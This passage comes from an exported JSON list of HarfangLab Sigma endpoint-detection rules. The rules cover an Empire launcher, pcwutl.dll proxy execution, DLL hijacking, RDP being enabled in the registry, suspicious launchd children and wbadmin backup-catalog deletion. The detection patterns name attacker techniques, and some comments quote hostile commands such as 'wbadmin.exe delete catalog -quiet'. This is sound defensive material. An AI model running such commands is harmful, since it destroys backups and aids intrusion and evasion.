SQBFAFgA'\n condition: all of selection_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d3f304b8-1e9a-4470-9285-7d649bfba41d",
"rule_name": "PowerShell Empire Launcher Detected",
"rule_description": "Detects a PowerShell command-line containing arguments that are related to Empire Attack Framework launcher.\nAttackers may use Empire to maintain access to a compromised system.\nIt is recommended to the newly created process for any suspicious activities.\n",
"rule_creation_date": "2020-09-29",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d3f425bc-d72a-4f92-aae4-1d489631df7d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080266Z",
"creation_date": "2026-03-23T11:45:34.080268Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080272Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/threat-detection-report/techniques/rundll32/",
"https://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html",
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_pcwutl.yml",
"content": "title: Proxy Execution via pcwutl.dll\nid: d3f425bc-d72a-4f92-aae4-1d489631df7d\ndescription: |\n Detects a suspicious invocation of the LaunchApplication function from the legitimate windows library pcwutl.dll by rundll32 to launch a binary.\n Attackers may abuse this legitimate binary and function to bypass security restrictions.\n It is recommended to check activities made by the newly spawned process to determine the legitimacy of this action.\nreferences:\n - https://redcanary.com/threat-detection-report/techniques/rundll32/\n - https://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2022/02/04\nmodified: 2025/04/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Pcwutl\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # rundll32.exe pcwutl.dll,LaunchApplication calc.exe\n selection_bin:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'RUNDLL32.EXE'\n\n selection_cmd:\n CommandLine|contains|all:\n - 'pcwutl.dll'\n - 'LaunchApplication'\n\n exclusion_pcwrun:\n ParentImage: '?:\\Windows\\System32\\msdt.exe'\n # GrandparentImage: '?:\\Windows\\System32\\pcwrun.exe' # sometime this information is not present\n # C:\\windows\\System32\\msdt.exe -path C:\\windows\\diagnostics\\index\\PCWDiagnostic.xml -af C:\\Users\\xxx\\AppData\\Local\\Temp\\PCW44A4.xml /skip TRUE\n # C:\\Windows\\System32\\msdt.exe -path C:\\Windows\\diagnostics\\index\\PCWDiagnostic.xml -af C:\\Users\\xxx\\AppData\\Local\\Temp\\PCW4E0.xml /skip TRUE\n # C:\\WINDOWS\\System32\\msdt.exe -path C:\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml -af C:\\Users\\xxx\\AppData\\Local\\Temp\\6\\PCW443D.xml /skip TRUE\n # C:\\Windows\\System32\\msdt.exe -path C:\\Windows\\diagnostics\\index\\PCWDiagnostic.xml -af d:\\profils\\xxx\\AppData\\Local\\Temp\\39\\PCWC040.xml /skip TRUE\n # C:\\Windows\\System32\\msdt.exe -path C:\\Windows\\diagnostics\\index\\PCWDiagnostic.xml -af C:\\Windows\\TEMP\\PCW4C65.xml /skip TRUE\n ParentCommandLine|contains: ' -path ?:\\windows\\diagnostics\\index\\PCWDiagnostic.xml'\n\n exclusion_pcwdiagnostic:\n ParentImage: '?:\\Windows\\System32\\msdt.exe'\n ParentCommandLine|contains: ' -id PCWDiagnostic'\n\n exclusion_edge:\n ParentImage: '?:\\Windows\\System32\\msdt.exe'\n CommandLine: '?:\\Windows\\system32\\rundll32.exe ?:\\Windows\\system32\\pcwutl.dll,LaunchApplication ?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n\n exclusion_micollab:\n CommandLine:\n - '?:\\Windows\\system32\\rundll32.exe ?:\\Windows\\system32\\pcwutl.dll,LaunchApplication ?:\\Program Files\\Mitel\\MiCollab\\MiCollab.exe'\n - '?:\\Windows\\system32\\rundll32.exe ?:\\Windows\\system32\\pcwutl.dll,LaunchApplication ?:\\Program Files (x86)\\Mitel\\MiCollab\\MiCollab.exe'\n\n exclusion_office:\n ParentImage: '?:\\Windows\\System32\\msdt.exe'\n CommandLine|startswith:\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\pcwutl.dll,LaunchApplication ?:\\Program Files (x86)\\Microsoft Office\\'\n - '?:\\WINDOWS\\system32\\rundll32.exe ?:\\WINDOWS\\system32\\pcwutl.dll,LaunchApplication ?:\\Program Files\\Microsoft Office\\'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d3f425bc-d72a-4f92-aae4-1d489631df7d",
"rule_name": "Proxy Execution via pcwutl.dll",
"rule_description": "Detects a suspicious invocation of the LaunchApplication function from the legitimate windows library pcwutl.dll by rundll32 to launch a binary.\nAttackers may abuse this legitimate binary and function to bypass security restrictions.\nIt is recommended to check activities made by the newly spawned process to determine the legitimacy of this action.\n",
"rule_creation_date": "2022-02-04",
"rule_modified_date": "2025-04-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d4448173-74b1-409b-b2ce-08cc7c899490",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090087Z",
"creation_date": "2026-03-23T11:45:34.090089Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090093Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_netiougc.yml",
"content": "title: DLL Hijacking via netiougc.exe\nid: d4448173-74b1-409b-b2ce-08cc7c899490\ndescription: |\n Detects potential Windows DLL Hijacking via netiougc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'netiougc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbgcore.DLL'\n - '\\dbghelp.dll'\n - '\\dhcpcsvc.DLL'\n - '\\IPHLPAPI.DLL'\n - '\\wdscore.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d4448173-74b1-409b-b2ce-08cc7c899490",
"rule_name": "DLL Hijacking via netiougc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via netiougc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d44bbe66-0318-4453-a55b-35121e765bba",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622320Z",
"creation_date": "2026-03-23T11:45:34.622321Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622326Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2021/05/12/conti-ransomware/",
"https://attack.mitre.org/techniques/T1021/001/"
],
"name": "t1021_001_rdp_enabled_registry.yml",
"content": "title: Remote Desktop Logon Enabled in Registry\nid: d44bbe66-0318-4453-a55b-35121e765bba\ndescription: |\n Detects a registry modification enabling RDP connections to a machine.\n Once the service is enabled, adversaries may connect to a remote system over RDP/RDS with known credentials to obtain an interactive access to the host.\n It can also be used with the Accessibility Features technique (T1546.008) to obtain the System privileges if Network Level Authentication is disabled.\n It is recommended to investigate suspicious authentications over RDP after the service has been enabled.\nreferences:\n - https://thedfirreport.com/2021/05/12/conti-ransomware/\n - https://attack.mitre.org/techniques/T1021/001/\ndate: 2022/12/01\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.001\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.ConfigChange\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_reg:\n EventType: 'SetValue'\n TargetObject:\n - 'HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections'\n - 'HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\\fDenyTSConnections'\n Details:\n - 'DWORD (0x00000000)'\n - 'QWORD (0x00000000-0x00000000)'\n\n selection_parent:\n # Parent information of a process can be missing.\n ProcessParentImage|contains: '?'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_ui_settings:\n ProcessImage: '?:\\Windows\\System32\\SystemSettingsAdminFlows.exe'\n ProcessCommandLine: '?:\\Windows\\system32\\SystemSettingsAdminFlows.exe RemoteDesktopTurnOnRdp'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_windeploy:\n ProcessCommandLine:\n - '?:\\$WINDOWS.~BT\\Sources\\SetupPlatform.exe /preoobe'\n - '?:\\Windows\\System32\\oobe\\Setup.exe'\n ProcessParentImage: '?:\\Windows\\System32\\oobe\\windeploy.exe'\n\n exclusion_tiworker:\n - ProcessCommandLine: '?:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe -Embedding'\n - ProcessParentCommandLine: '?:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_*\\TiWorker.exe -Embedding'\n\n exclusion_systemproperties:\n ProcessImage:\n - '?:\\Windows\\System32\\SystemPropertiesRemote.exe'\n - '?:\\Windows\\System32\\SystemPropertiesAdvanced.exe'\n - '?:\\Windows\\System32\\SystemPropertiesComputerName.exe'\n ProcessSigned: 'true'\n ProcessSignature: \"Microsoft Windows\"\n\n exclusion_device_enroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n ProcessParentImage: '?:\\Windows\\system32\\svchost.exe'\n\n exclusion_ccm:\n ProcessParentImage: '?:\\Windows\\CCM\\OSDRunPowerShellScript.exe'\n ProcessGrandparentImage: '?:\\Windows\\CCM\\TSManager.exe'\n\n exclusion_siemens:\n ProcessImage: '?:\\Windows\\Temp\\TSplusInstaller\\Setup-Siemens.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'TSplus SAS'\n\n exclusion_systancia:\n ProcessImage: '?:\\Program Files (x86)\\Systancia\\AppliDis\\AdisDesktopInfrastructure\\AdisVDIDesktopAgent\\AdisVDIDesktopAgent.exe'\n\n exclusion_altiris:\n ProcessGrandparentImage: '?:\\Program Files\\Altiris\\Dagent\\dagent.exe'\n\n exclusion_wapt:\n - ProcessImage: '?:\\Program Files (x86)\\wapt\\waptpython.exe'\n - ProcessParentImage: '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n - ProcessGrandparentImage: '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n\n exclusion_power_automate_custom_action:\n ProcessOriginalFileName: 'RUNDLL32.EXE'\n ProcessCommandLine|contains: 'Microsoft.Flow.UIflow.CustomActions.PermissionCustomActions.SetRDPConnectionsPermissions'\n\n exclusion_bmc:\n ProcessGrandparentImage:\n - '?:\\Program Files\\BMC Software\\Client Management\\Client\\bin\\mtxagent.exe'\n - '?:\\Program Files\\BMC Software\\Client Management\\Client\\bin\\mtxproxy.exe'\n\n exclusion_aws:\n ProcessGrandparentImage: '?:\\Program Files (x86)\\AWS Replication Agent\\dist\\launch_convert.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d44bbe66-0318-4453-a55b-35121e765bba",
"rule_name": "Remote Desktop Logon Enabled in Registry",
"rule_description": "Detects a registry modification enabling RDP connections to a machine.\nOnce the service is enabled, adversaries may connect to a remote system over RDP/RDS with known credentials to obtain an interactive access to the host.\nIt can also be used with the Accessibility Features technique (T1546.008) to obtain the System privileges if Network Level Authentication is disabled.\nIt is recommended to investigate suspicious authentications over RDP after the service has been enabled.\n",
"rule_creation_date": "2022-12-01",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.001",
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d44c6de2-d37f-4e36-8fa1-f23231dd7632",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295355Z",
"creation_date": "2026-03-23T11:45:35.295359Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295366Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1543/001/",
"https://attack.mitre.org/techniques/T1543/004/",
"https://attack.mitre.org/techniques/T1204/002/",
"https://attack.mitre.org/techniques/T1564/001/"
],
"name": "t1543_004_launchd_susp_child.yml",
"content": "title: Suspicious Launchd Child Process\nid: d44c6de2-d37f-4e36-8fa1-f23231dd7632\ndescription: |\n Detects a suspicious process execution by launchd.\n Adversaries may install a persistence using a launch agent or daemon in order to keep remote access to a compromise asset between reboot.\n It is recommended to check the maliciousness of the executed file.\nreferences:\n - https://attack.mitre.org/techniques/T1543/001/\n - https://attack.mitre.org/techniques/T1543/004/\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2024/05/10\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1543.001\n - attack.t1543.004\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1564.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.Behavior.Persistence\n - classification.macOS.Behavior.SystemModification\nlogsource:\n product: macos\n category: process_creation\ndetection:\n # Agents below 4.0.0 do not support signed MacOS processes, we need this for exclusion\n selection_agent_version:\n AgentVersion|gte|version: 4.0.0\n\n selection_launchd:\n ProcessParentImage: '/sbin/launchd'\n\n selection_susp_hidden:\n ProcessName|startswith: '.'\n\n selection_susp_folder:\n Image|startswith:\n - '/Users/shared/'\n - '/private/tmp/'\n - '/private/var/folders/'\n - '/Library/Containers/'\n - '/private/var/root/'\n\n selection_susp_bin:\n Image|endswith: '/dseditgroup'\n\n selection_susp_shell:\n Image:\n - '/bin/sh'\n - '/bin/zsh'\n - '/bin/bash'\n CommandLine|contains:\n - 'curl '\n - 'base64 '\n - 'python '\n\n selection_signed:\n Signed: 'true'\n\n filter_adhoc_sig:\n CodesigningFlagsStr|contains: 'CS_ADHOC'\n\n exclusion_folder:\n Image|startswith:\n - '/private/var/folders/??/'\n - '/private/tmp/KSInstallAction.'\n - '/private/tmp/PKInstallSandbox.??????/'\n\n exclusion_libexec:\n CommandLine|contains:\n - '/usr/libexec/tmp_cleaner'\n - '/usr/libexec/gkreport'\n\n exclusion_asdf:\n CommandLine|contains: ' /opt/homebrew/opt/asdf/libexec/bin/asdf '\n\n exclusion_pm2:\n CommandLine: 'PM2 v*: God Daemon (/*/.pm2) SILENT=true'\n\n\n exclusion_flowjo:\n CommandLine|startswith: '/Applications/FlowJo.app/Contents/MacOS/flowjoJavaApplicationStub -c'\n\n exclusion_nix:\n Image:\n - '/bin/bash'\n - '/bin/sh'\n CommandLine|startswith: '/bin/sh -c exec /nix/store/'\n\n exclusion_xquartz:\n CommandLine|contains: '-c exec \"${@}\" - /Applications/Utilities/XQuartz.app/Contents/MacOS/X11.bin'\n\n exclusion_adobe:\n SignatureSigningId: 'com.adobe.*'\n Signed: 'true'\n\n exclusion_fiery:\n Image: '/private/tmp/Fiery Printer Driver Installer.app/Contents/Resources/User Software/OSX/Printer Driver/Installer Wizard.app/Contents/MacOS/Fiery Printer Driver Installer'\n Signed: 'true'\n\n exclusion_epic_games:\n Image|startswith: '/Users/Shared/Epic Games/'\n\n exclusion_parallels:\n Image|startswith: '/Users/Shared/Parallels/'\n\n condition: selection_launchd and selection_agent_version and 1 of selection_susp_* and not (1 of exclusion_* or (selection_signed and not filter_adhoc_sig))\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d44c6de2-d37f-4e36-8fa1-f23231dd7632",
"rule_name": "Suspicious Launchd Child Process",
"rule_description": "Detects a suspicious process execution by launchd.\nAdversaries may install a persistence using a launch agent or daemon in order to keep remote access to a compromise asset between reboot.\nIt is recommended to check the maliciousness of the executed file.\n",
"rule_creation_date": "2024-05-10",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1204.002",
"attack.t1543.001",
"attack.t1543.004",
"attack.t1564.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d46896a1-b2db-4315-9403-87083d67a701",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080040Z",
"creation_date": "2026-03-23T11:45:34.080042Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080046Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1490/"
],
"name": "t1490_wbadmin_delete_catalog.yml",
"content": "title: Windows Backup Catalog Deleted\nid: d46896a1-b2db-4315-9403-87083d67a701\ndescription: |\n Detects when the wbadmin utility is used to delete Windows backup catalogs.\n This has been used by numerous malwares and ransomwares to hinder recovery methods.\n It is recommended to investigate the parent process and other detection on the host to determine if this action was legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1490/\ndate: 2020/10/08\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1490\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Deletion\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bcdedit:\n - Image|endswith: '\\wbadmin.exe'\n - OriginalFileName: 'WBADMIN.EXE'\n\n selection_cmdline_1:\n CommandLine|contains: 'delete'\n\n selection_cmdline_2:\n # https://blog.lexfo.fr/lockbit-malware.html\n # wbadmin.exe delete catalog -quiet\n # wbadmin DELETE SYSTEMSTATEBACKUP\n CommandLine|contains:\n - 'catalog'\n - 'SYSTEMSTATEBACKUP'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d46896a1-b2db-4315-9403-87083d67a701",
"rule_name": "Windows Backup Catalog Deleted",
"rule_description": "Detects when the wbadmin utility is used to delete Windows backup catalogs.\nThis has been used by numerous malwares and ransomwares to hinder recovery methods.\nIt is recommended to investigate the parent process and other detection on the host to determine if this action was legitimate.\n",
"rule_creation_date": "2020-10-08",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1490"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d48da338-7c83-49b0-b766-ffd14fb2048a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096573Z",
"creation_date": "2026-03-23T11:45:34.096575Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096579Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sysreseterr.yml",
"content": "title: DLL Hijacking via sysreseterr.exe\nid: d48da338-7c83-49b0-b766-ffd14fb2048a\ndescription: |\n Detects potential Windows DLL Hijacking via sysreseterr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'sysreseterr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dui70.dll'\n - '\\WDSCORE.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d48da338-7c83-49b0-b766-ffd14fb2048a",
"rule_name": "DLL Hijacking via sysreseterr.exe",
